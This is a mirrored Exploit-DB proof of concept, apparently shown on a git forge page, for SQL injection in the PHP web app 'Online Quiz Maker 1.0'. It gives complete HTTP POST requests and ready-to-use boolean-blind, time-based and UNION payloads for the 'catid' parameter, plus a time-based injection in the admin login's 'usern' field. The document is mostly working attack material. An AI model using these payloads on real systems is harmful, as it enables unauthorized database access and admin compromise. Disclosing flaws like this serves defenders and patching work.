bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/45323.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

77 lines
No EOL
2.4 KiB
Text
Raw Blame History

# Exploit Title: Online Quiz Maker 1.0 - 'catid' SQL Injection
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.hscripts.com/scripts/php/quiz-maker.php
# Software Link:https://www.hscripts.com/scripts/php/downloads/quiz-maker.zip
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : An attacker can execute SQL commands through parameters
# that contain vulnerable.
# An authorized user can use the filtering feature and can fully authorize
# the database or other server informations. Also there are XSS
# vulnerabilities too.
# PoC : SQLi 1 :
# Request(POST):
POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.hscripts.com/scripts/php/quiz-system/quiz-system.php
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
uname=test&catid=1
# Parameter: catid (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload:
uname=test&catid=1 AND 4815=4815
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload:
uname=test&catid=1 AND SLEEP(5)
# Type: UNION query
# Title: Generic UNION query (NULL) - 10 columns
# Payload:
uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x56476b436866655067774c6d786b6e434f59566c7541666363786855764c686b5949486e6a4d6b68,0x7178716271),NULL,NULL,NULL--bocR
# PoC : SQLi 2: Admin Login SQL Injection
# Request(POST):
POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://server/admin/add-category.php
Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
usern=testing&passw=password&type=auth
# Parameter: usern (POST)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload:
usern=testing' AND SLEEP(5) AND 'ZECL'='ZECL&passw=password&type=auth
Reference in a new issue View git blame Copy permalink